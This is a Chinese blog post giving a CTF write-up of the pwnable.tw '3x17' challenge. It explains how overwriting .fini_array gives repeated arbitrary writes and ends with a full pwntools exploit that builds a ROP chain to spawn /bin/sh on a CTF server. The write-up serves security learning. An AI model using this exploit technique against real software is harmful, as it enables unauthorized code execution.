[pwnable] 3x17 分析与思考

最新推荐文章于 2023-07-28 23:10:37 发布
最新推荐文章于 2023-07-28 23:10:37 发布
阅读量630 收藏 1
点赞数 1
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tokameine/article/details/120103628
版权

        有点炫酷的利用方式,不得不承认,确实让我长见识了。

正文:

void __fastcall __noreturn start(__int64 a1, __int64 a2, int a3)
{
  __int64 v3; // rax
  int v4; // esi
  __int64 v5; // [rsp-8h] [rbp-8h] BYREF
  void *retaddr; // [rsp+0h] [rbp+0h] BYREF

  v4 = v5;
  v5 = v3;
  sub_401EB0(sub_401B6D, v4, &retaddr, sub_4028D0, sub_402960, a3, &v5);
  __halt();
}

        由于符号表完全抹去,所以只能从start函数开始,但要找到main函数却不是很困难

__int64 sub_401B6D()
{
  __int64 result; // rax
  char *v1; // [rsp+8h] [rbp-28h]
  char buf[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  result = ++byte_4B9330;
  if ( byte_4B9330 == 1 )
  {
    sub_446EC0(1u, "addr:", 5uLL);
    sub_446E20(0, buf, 0x18uLL);
    v1 = sub_40EE70(buf);
    sub_446EC0(1u, "data:", 5uLL);
    sub_446E20(0, v1, 0x18uLL);
    result = 0LL;
  }
  if ( __readfsqword(0x28u) != v3 )
    sub_44A3E0();
  return result;
}

         经过简单的分析可以发现,程序提供了一个简单的“任意地址读写功能”,但每次只能读取0x18个字节

        显然,这完全不够用,不论是写rop还是shellcode,因此当下的目标是希望能够写更多的内容

具体参考该文章:https://blog.csdn.net/gary_ygl/article/details/8506007

本篇博客只进行简要的描述

         一个程序从启动到main函数再到结束的这一过程中有多个必然存在的函数起作用,以如下为例:

void __fastcall __noreturn start(__int64 a1, __int64 a2, void (*a3)(void))
{
  __int64 v3; // rax
  int v4; // esi
  __int64 v5; // [rsp-8h] [rbp-8h] BYREF
  char *retaddr; // [rsp+0h] [rbp+0h] BYREF

  v4 = v5;
  v5 = v3;
  _libc_start_main(main, v4, &retaddr, init, fini, a3, &v5);
  __halt();
}

其运行流程为:

  1. start函数
  2. _libc_start_main函数
  3. __libc_csu_init
  4. main函数
  5. __libc_csu_fini

        程序在最终将会回到_libc_start_main,并调用其中的exit函数退出

        本例中的init和fini为指向__libc_csu_init与__libc_csu_fini的指针

        而在这两个函数中,又会通过.init_array与.fini_array数组中的地址来调用对应的函数

        结论是:

  1. .__libc_csu_init
  2. .init_array[0]
  3. .init_array[1]
  5. .init_array[n]
  6. main
  7. __libc_csu_init
  8. .fini_array[n]
  10. .fini_array[1]
  11. .fini_array[0]

        在有如上知识之后,攻击目标便明确了,如果试图复写fini_array数组为main,则又会重新进入main,如果再加上__libc_csu_fini函数地址,就能实现无限次数的任意地址读写了

        若能进行任意地址任意大小的读写,那么只要找个合适的段写入rop链,并让程序返回到这里即可(也可以尝试写入shellcode,但往往没办法找到合适段,也因为找不到mprotect函数,所有不太容易修改执行权限)

        本例中的利用方法相当特别,观察__libc_csu_fini函数:

.text:0000000000402960 sub_402960      proc near               ; DATA XREF: start+F↑o
.text:0000000000402960 ; __unwind {
.text:0000000000402960                 push    rbp
.text:0000000000402961                 lea     rax, unk_4B4100
.text:0000000000402968                 lea     rbp, off_4B40F0
.text:000000000040296F                 push    rbx
.text:0000000000402970                 sub     rax, rbp
.text:0000000000402973                 sub     rsp, 8
.text:0000000000402977                 sar     rax, 3
.text:000000000040297B                 jz      short loc_402996
.text:000000000040297D                 lea     rbx, [rax-1]
.text:0000000000402981                 nop     dword ptr [rax+00000000h]
.text:0000000000402988
.text:0000000000402988 loc_402988:                             ; CODE XREF: sub_402960+34↓j
.text:0000000000402988                 call    qword ptr [rbp+rbx*8+0]
.text:000000000040298C                 sub     rbx, 1
.text:0000000000402990                 cmp     rbx, 0FFFFFFFFFFFFFFFFh
.text:0000000000402994                 jnz     short loc_402988
.text:0000000000402996
.text:0000000000402996 loc_402996:                             ; CODE XREF: sub_402960+1B↑j
.text:0000000000402996                 add     rsp, 8
.text:000000000040299A                 pop     rbx
.text:000000000040299B                 pop     rbp
.text:000000000040299C                 jmp     _term_proc
.text:000000000040299C ; } // starts at 402960
.text:000000000040299C sub_402960      endp

         0000000000402968处将rbp置为0x4B40F0,对应了.fini_array数组,而在这个数组下面还有一个.data.rel.ro段可用于读写

.fini_array:00000000004B40F0 _fini_array     segment qword public 'DATA' use64
.fini_array:00000000004B40F0                 assume cs:_fini_array
.fini_array:00000000004B40F0                 ;org 4B40F0h
.fini_array:00000000004B40F0 off_4B40F0      dq offset sub_401B00    ; DATA XREF: sub_4028D0+4C↑o
.fini_array:00000000004B40F0                                         ; sub_402960+8↑o
.fini_array:00000000004B40F8                 dq offset sub_401580
.fini_array:00000000004B40F8 _fini_array     ends

.data.rel.ro:00000000004B4100 _data_rel_ro    segment align_32 public 'DATA' use64
.data.rel.ro:00000000004B4100                 assume cs:_data_rel_ro
.data.rel.ro:00000000004B4100                 ;org 4B4100h
.data.rel.ro:00000000004B4100 unk_4B4100      db    2                 ; DATA XREF: sub_402960+1↑o
.data.rel.ro:00000000004B4100                                         ; sub_40EBF0:loc_40ECC8↑o ...
.data.rel.ro:00000000004B4101                 db    0
.data.rel.ro:00000000004B4102                 db    0

         而0000000000402988处则会直接call入.fini_array中指向的地址

        那么,如果我们修改fini_array[0]为leave_ret地址,rsp就会被劫持到这里,然后通过ret或者pop将其指向00000000004B4100,即可完成劫持,运行构造好的rop链

        不过现在一想,这种复写.fini_array的方式实际上是在进行类似于递归的操作,那么程序迟早会被掐掉.....或许在某些时候会成为一种限制吧......

完整exp:

#coding=utf-8
from pwn import *
import sys
reload(sys)
sys.setdefaultencoding('utf8')
context.log_level='debug'

#p=process("./3x17")
p=remote("node4.buuoj.cn",25584)
elf=ELF("./3x17")

finiarr=0x0000000004B40F0
main=0x401B6D
libc_scu_fini=0x402960

p.sendlineafter("addr:",str(finiarr))
p.sendlineafter("data:",p64(libc_scu_fini)+p64(main))

rdi_ret=0x0000000000401696
rsi_ret=0x0000000000406c30
rdx_ret=0x0000000000446e35
leave_ret=0x401C4B
syscall=0x4022b4
poprax = 0x41e4af
#gdb.attach(p)
ret=0x0000000000401016
p.sendlineafter("addr:",str(finiarr+0x10))
p.sendlineafter("data:",p64(rsi_ret)+p64(0))


p.sendlineafter("addr:",str(finiarr+0x20))
p.sendlineafter("data:",p64(rdx_ret)+p64(0))

p.sendlineafter("addr:",str(finiarr+0x30))
p.sendlineafter("data:",p64(poprax)+p64(0x3b))


p.sendlineafter("addr:",str(finiarr+0x40))
p.sendlineafter("data:",p64(rdi_ret)+p64(finiarr+0x60))

p.sendlineafter("addr:",str(finiarr+0x50))
p.sendlineafter("data:",p64(syscall))

p.sendlineafter("addr:",str(finiarr+0x60))
p.sendlineafter("data:",'/bin/sh\x00')

p.sendlineafter("addr:",str(finiarr))
p.sendafter("data:",p64(leave_ret)+p64(ret))

p.interactive()

参考:https://xuanxuanblingbling.github.io/ctf/pwn/2019/09/06/317/

Tokameine
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
七彩虹笔记本 X17 AT 23 bios文件
06-07
标题 "七彩虹笔记本 X17 AT 23 bios文件" 提及的是七彩虹品牌的一款笔记本电脑,型号为X17 AT 23,涉及到的核心内容是该设备的BIOS(基本输入输出系统)文件。BIOS是计算机硬件与操作系统之间的一个关键软件层,负责...
[buuctf][MRCTF2020]hello_world_go
逆向萌新的博客
07-14 813
[buuctf][MRCTF2020]hello_world_go
[WUSTCTF 2020]funnyre-复现
liaochonxiang的博客
07-28 210
先来到startmain存在花指令,那就去除找到一处jz与jnz跳转一样,下面call和jnz也存在花指令一起nop掉这样的花指令存在4个,全部nop掉后f5得到伪代码但是里面存在这样的错误同样存在4处找到原先nop与其他地方对比发现,需要nop到xor前在main头处按p键生成函数进入main,分析,可用angr符号执行秒了flag长度为32位,加密后的flag在unk_4025C0。
re每日一题(20200528)
Prowes5的博客
05-28 287
re每日一题(20200528) BabyDriver 2020GKCTF 64位驱动逆向,函数不是很多。看到\\Driver\\Kbdclass可以感觉是个键盘驱动,且调用了KdDisableDebugger()具有反调试。既然是CTF,就不需要完全分析,直接找关键地方。可以在sub_140001380找到flag的关键。 __int64 __fastcall sub_140001380(__int64 a1, __int64 a2) { __int64 v2; // rbx __int64
pwnable.kr [flag]
shisuan1的博客
11-25 293
pwnable.kr [flag] Papa brought me a packed present! let’s open it. Download : http://pwnable.kr/bin/flag This is reversing task. all you need is binary 题目要求直接看二进制文件。ida打开观察一波 反编译代码如下 __int64 __fastc...
[XCTF-Reverse] 83 2019_UNCTF_easyvm
weixin_52640415的博客
03-28 467
到了后边就都不会了,只有这个VM还可以磨磨 主程序非常短,输入32个字节然后就去比较了 signed __int64 __fastcall main(__int64 a1, char **a2, char **a3) { unsigned int (__fastcall ***v3)(_QWORD, void *, void *, char *); // rbx char s; // [rsp+10h] [rbp-80h] int v6; // [rsp+70h] [rbp-20h]
教案电气控制与PLC应用.doc
11-17
使用八进制(X0~X7,X10~X17……),FX2N系列PLC最多可扩展184个输入端。输入接口电路用来接收外部开关量输入信号,内部电路的主要器件是光电耦合器,光耦可以提高PLC的抗干扰能力和安全性能。 6. 输出接口电路 ...
Dell戴尔Alienware外星人x17 R2出厂状态原装原厂系统
11-06
《Dell戴尔Alienware外星人x17 R2出厂原装系统详解》 在IT领域,原厂系统通常是指计算机出厂时预装的操作系统及配套软件,这种系统通常经过厂商精心优化,能够更好地发挥硬件性能。本文将详细探讨Dell戴尔Alienware...
Fujitsu Siemen Amilo Xa 3530 (Wistron X17).PDF
最新发布
12-28
Fujitsu Siemen Amilo Xa 3530 (Wistron X17)笔记本电脑系统架构分析 通过分析Fujitsu Siemen Amilo Xa 3530 (Wistron X17)笔记本电脑的系统架构图,我们可以看到该笔记本电脑的系统架构主要由以下几个部分组成: ...
ZD-60X17FJ换箱多轴钻.rar
05-02
本文将重点围绕"ZD-60X17FJ换箱多轴钻"这一设备,探讨三菱PLC程序在实际应用中的具体实现与功能。 ZD-60X17FJ换箱多轴钻是一种高效的多轴钻孔设备,它能够同时对工件进行多个位置的精准钻孔,大大提升了加工效率。...
[WUSTCTF2020]level3 笔记与自省
Tokameine的博客
06-21 299
解题过程: 直接放入IDA分析,跳入main函数,得到如下内容 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // rax char v5; // [rsp+Fh] [rbp-41h] char v6[56]; // [rsp+10h] [rbp-40h] BYREF unsigned __int64 v7; // [rsp+48h] [rbp-8h] v7 = _..
pwnable.tw 3x17 经验总结
qq_43189757的博客
10-25 954
这题涨姿势了, 学到了不少东西, 对静态链接的题目也有了一点了解 参考的wp: 和媳妇一起学pwn之3x17(不得不说这名字真的sao… , 不过文章写的挺好的 分析: 由于程序是静态编译的, 把符号表给剥离了, 所以无法直接找到main函数, 可以先观察程序的入口点start 在地址0x0000000000401A74处调用了一个函数, 而这个函数其实就是libc_start_main函数 l...
【reverse】buu-[Zer0pts2020]easy_strcmp——main函数的启动过程+IDA动态调试ELF
hans774882968的博客
09-12 694
64位ELF。用IDA打开即可看到main函数:会这么简单嘛?我们应该关注a2[1]是否被修改了。因此看看start函数:查阅_libc_start_main的资料(参考链接1)可知init函数会在main函数之前被调用。有这些函数被调用了:看了看sub_6E0啥也没有,那重点肯定是sub_795了…… 即使不知道sub_795 hook了strcmp也没关系,我们断点断在main函数,然后“步进”strcmp函数也能找到关键代码。
pwnable.tw之3x17
蚁景网安学院
07-03 511
前言最近在pwnable做题遇到一道静态编译的二进制文件,并且是去除符号表的,从这道题可以学习到main函数的由来,以及start函数的部分知识。题目这里以pwnable.tw的3x17...
全国大学生信息安全竞赛(2019)--- easyGo(逆向,Go语言)
s0il的博客
04-21 1827
第一步首先想到的是,使用gdb打开,进行动态调试,但是我不知道怎样下断点在程序未运行时,下断点,因为它老是报错:: 这些是对于文件的操作,找错方向了 搜索字符串read: 向上翻一点: 核心函数: Go语言用IDA根本找不到调用的标准库函数,导致的结果是import窗口一片空白,所以确定核心函数很关键。 由Try again 的错误提示字符串,...
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 322
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
从格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4274
以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
简易建站(试水)过程
Morlvoid的博客
06-30 156
参考教程 : B站视频教程 : 视频链接 : 10分钟拥有真正意义上属于自己的网站!网站搭建! ( 并没有完全按照视频教程 , 其中一些更改请参照视频和文章内容仔细对比 : ) 指导 : Tokameine 准备过程 : 域名 : 在阿里云购买域名后解析 服务器 : 阿里云轻量应用服务器 应用镜像 : BT-Panel 系统镜像 : CentOS 7.3 其他根据个人需求选择 之后付款购买 , 绑定域名 防火墙 添加规则 : 开放一些端口 ( 可能并不需要开放那么多 ) HTTP TCP
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1386
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
Fujitsu Siemen Amilo Xa 3530 系统框图与组件列表(Wistron X17)
本文档是关于Fujitsu Siemens Amilo Xa 3530笔记本电脑的相关技术图纸,由Wistron X17公司提供,该系列电脑的系统框图详细列出了其内部组件配置。文档包含了以下几个关键部分: 1. **系统框图**:文档提供了多个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值